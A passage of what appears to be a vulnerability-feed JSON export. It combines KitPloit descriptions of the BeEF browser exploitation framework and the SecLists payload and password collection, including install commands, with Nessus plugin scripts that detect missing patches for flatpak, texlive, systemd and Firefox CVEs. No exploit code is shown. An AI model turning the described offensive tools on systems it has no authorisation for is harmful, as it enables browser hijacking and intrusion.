{"kitploit": [{"lastseen": "2019-02-22T16:53:23", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-wALH3xVsR4U/XDa-x6L3swI/AAAAAAAANto/wx25StnnZy8vOB9abUzYrf_FfM8WljppgCLcBGAs/s1600/BeEF.jpg>)\n\n \n** What is BeEF? ** \n\n\n** BeEF ** is short for ** The Browser [ Exploitation ](<https://www.kitploit.com/search/label/Exploitation>) Framework ** . It is a [ penetration testing ](<https://www.kitploit.com/search/label/Penetration%20Testing>) tool that focuses on the web browser. \n\nAmid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web [ browsers ](<https://www.kitploit.com/search/label/Browsers>) and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. \n\n \n** Get Involved ** \nYou can get in touch with the BeEF team. Just check out the following: \n** Please, send us pull requests! ** \n** Web: ** [ https://beefproject.com/ ](<https://beefproject.com/>) \n** Bugs: ** [ https://github.com/beefproject/beef/issues ](<https://github.com/beefproject/beef/issues>) \n** Security Bugs: ** [email protected] \n** IRC: ** ircs://irc.freenode.net/beefproject \n** Twitter: ** @beefproject \n \n** Requirements ** \n\n\n * Operating System: Mac OSX 10.5.0 or higher / modern Linux \n * [ Ruby ](<https://www.ruby-lang.org/>) : 2.3 or newer \n * [ SQLite ](<https://sqlite.org/>) : 3.x \n * [ Node.js ](<https://nodejs.org/>) : 6 or newer \n * The gems listed in the Gemfile: [ https://github.com/beefproject/beef/blob/master/Gemfile ](<https://github.com/beefproject/beef/blob/master/Gemfile>)\n * brew install selenium-server-standalone (See [ https://github.com/shvets/selenium ](<https://github.com/shvets/selenium>) ) \n \n** Quick Start ** \n** The following is for the impatient. ** \nThe ` install ` script installs the required operating system packages and all the prerequisite Ruby gems: \n$ ./install \nFor full installation details, please refer to [ INSTALL.txt ](<https://github.com/beefproject/beef/blob/master/INSTALL.txt>) . \nWe also have an [ Installation ](<https://github.com/beefproject/beef/wiki/Installation>) page on the wiki. \nUpon successful installation, be sure to read the [ Configuration ](<https://github.com/beefproject/beef/wiki/Configuration>) page on the wiki for important details on configuring and securing BeEF. \n \n** Usage ** \nTo get started, simply execute beef and follow the instructions: \n\n \n \n $ ./beef\n\n \n** Video ** \n\n\n \n \n\n\n** [ Download Beef ](<https://github.com/beefproject/beef>) **\n", "modified": "2019-02-22T12:39:01", "published": "2019-02-22T12:39:01", "id": "KITPLOIT:6681544675241878887", "href": "http://www.kitploit.com/2019/02/beef-browser-exploitation-framework.html", "title": "BeEF - The Browser Exploitation Framework Project", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T16:51:33", "bulletinFamily": "tools", "description": "[  ](<https://2.bp.blogspot.com/-4sOfrcf_e3M/XDa-EnigEgI/AAAAAAAANtc/8DoLz0kmAtY8YyPE6MFttD-3Wi0KbTqjwCLcBGAs/s1600/SecLists_1.png>)\n\n \n\n\nSecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, [ fuzzing ](<https://www.kitploit.com/search/label/Fuzzing>) payloads, web shells, and many more. The goal is to enable a security tester to pull this repository onto a new [ testing ](<https://www.kitploit.com/search/label/Testing>) box and have access to every type of list that may be needed. \n\nThis project is maintained by [ Daniel Miessler ](<https://danielmiessler.com/>) , [ Jason Haddix ](<http://www.securityaegis.com/>) , and [ g0tmi1k ](<https://twitter.com/g0tmi1k>) . \n \n** Install ** \n** Zip ** \n\n \n \n wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \\\n && unzip SecList.zip \\\n && rm -f SecList.zip\n\n** Git (Small) ** \n\n \n \n git clone --depth 1 https://github.com/danielmiessler/SecLists.git\n\n** Git (Complete) ** \n\n \n \n git clone [email\u00a0protected]:danielmiessler/SecLists.git\n\n** Kali Linux ** ( [ Tool Page ](<https://tools.kali.org/password-attacks/seclists>) ) \n\n \n \n apt -y install seclists\n\n \n \n\n\n** [ Download SecLists ](<https://github.com/danielmiessler/SecLists>) **\n", "modified": "2019-02-21T12:37:00", "published": "2019-02-21T12:37:00", "id": "KITPLOIT:759720852629062407", "href": "http://www.kitploit.com/2019/02/seclists-collection-of-multiple-types.html", "title": "SecLists - A Collection Of Multiple Types Of Lists Used During Security Assessments, Collected In One Place (Usernames, Passwords, URLs, Sensitive Data Patterns, Fuzzing Payloads, Web Shells, And Many More)", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2019-02-23T01:52:09", "bulletinFamily": "scanner", "description": "Security Fix(es) :\n\n - flatpak: potential /proc based sandbox escape (CVE-2019-8308)", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "SL_20190221_FLATPAK_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122391", "title": "Scientific Linux Security Update : flatpak on SL7.x x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122391);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\"CVE-2019-8308\");\n\n script_name(english:\"Scientific Linux Security Update : flatpak on SL7.x x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - flatpak: potential /proc based sandbox escape\n (CVE-2019-8308)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1902&L=SCIENTIFIC-LINUX-ERRATA&P=7835\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?869fdc5a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-60.5.1-1.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-debuginfo-60.5.1-1.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"flatpak-1.0.2-4.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"flatpak-builder-1.0.0-4.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"flatpak-debuginfo-1.0.2-4.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"flatpak-devel-1.0.2-4.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"flatpak-libs-1.0.2-4.el7_6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-23T01:52:09", "bulletinFamily": "scanner", "description": "This update for texlive fixes the following issue :\n\nCVE-2018-17407: Prevent buffer overflow when handling of Type 1 fonts allowed arbitrary code execution when a malicious font was loaded by one of the vulnerable tools: pdflatex, pdftex, dvips, or luatex (bsc#1109673)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "SUSE_SU-2018-3033-2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122393", "title": "SUSE SLES12 Security Update : texlive (SUSE-SU-2018:3033-2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3033-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122393);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\"CVE-2018-17407\");\n\n script_name(english:\"SUSE SLES12 Security Update : texlive (SUSE-SU-2018:3033-2)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for texlive fixes the following issue :\n\nCVE-2018-17407: Prevent buffer overflow when handling of Type 1 fonts\nallowed arbitrary code execution when a malicious font was loaded by\none of the vulnerable tools: pdflatex, pdftex, dvips, or luatex\n(bsc#1109673)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1109673\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-17407/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20183033-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?767631ab\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2019-458=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2019-458=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2019-458=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2019-458=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2019-458=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2019-458=1\n\nSUSE Enterprise Storage 4:zypper in -t patch SUSE-Storage-4-2019-458=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libkpathsea6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libkpathsea6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(0|1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libkpathsea6-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libkpathsea6-debuginfo-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libkpathsea6-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libkpathsea6-debuginfo-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkpathsea6-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkpathsea6-debuginfo-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libkpathsea6-6.2.0dev-22.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libkpathsea6-debuginfo-6.2.0dev-22.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"texlive\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-23T01:52:09", "bulletinFamily": "scanner", "description": "Security Fix(es) :\n\n - systemd: Insufficient input validation in bus_process_object() resulting in PID 1 crash (CVE-2019-6454)", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "SL_20190221_SYSTEMD_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122392", "title": "Scientific Linux Security Update : systemd on SL7.x x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122392);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\"CVE-2019-6454\");\n\n script_name(english:\"Scientific Linux Security Update : systemd on SL7.x x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - systemd: Insufficient input validation in\n bus_process_object() resulting in PID 1 crash\n (CVE-2019-6454)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1902&L=SCIENTIFIC-LINUX-ERRATA&P=6852\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?10da97a4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libgudev1-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libgudev1-devel-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-debuginfo-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-devel-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-journal-gateway-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-libs-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-networkd-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-python-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-resolved-219-62.el7_6.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"systemd-sysv-219-62.el7_6.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-23T01:52:08", "bulletinFamily": "scanner", "description": "This update upgrades Firefox to version 60.5.1 ESR.\n\nSecurity Fix(es) :\n\n - chromium-browser, mozilla: Use after free in Skia (CVE-2018-18356)\n\n - mozilla: Integer overflow in Skia (CVE-2019-5785)", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "SL_20190219_FIREFOX_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122389", "title": "Scientific Linux Security Update : firefox on SL6.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122389);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\"CVE-2018-18356\", \"CVE-2019-5785\");\n\n script_name(english:\"Scientific Linux Security Update : firefox on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update upgrades Firefox to version 60.5.1 ESR.\n\nSecurity Fix(es) :\n\n - chromium-browser, mozilla: Use after free in Skia\n (CVE-2018-18356)\n\n - mozilla: Integer overflow in Skia (CVE-2019-5785)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1902&L=SCIENTIFIC-LINUX-ERRATA&P=7176\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2bca94ba\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"firefox-60.5.1-1.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"firefox-debuginfo-60.5.1-1.el6_10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-23T01:52:09", "bulletinFamily": "scanner", "description": "An update for flatpak is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nFlatpak is a system for building, distributing, and running sandboxed desktop applications on Linux.\n\nSecurity Fix(es) :\n\n* flatpak: potential /proc based sandbox escape (CVE-2019-8308)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nNote that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "VIRTUOZZO_VZLSA-2019-0375.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122400", "title": "Virtuozzo 7 : flatpak / flatpak-builder / flatpak-devel / etc (VZLSA-2019-0375)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122400);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\n \"CVE-2019-8308\"\n );\n\n script_name(english:\"Virtuozzo 7 : flatpak / flatpak-builder / flatpak-devel / etc (VZLSA-2019-0375)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for flatpak is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nFlatpak is a system for building, distributing, and running sandboxed\ndesktop applications on Linux.\n\nSecurity Fix(es) :\n\n* flatpak: potential /proc based sandbox escape (CVE-2019-8308)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2019-0375.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?103e30e8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:0375\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flatpak / flatpak-builder / flatpak-devel / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:flatpak\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:flatpak-builder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:flatpak-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:flatpak-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 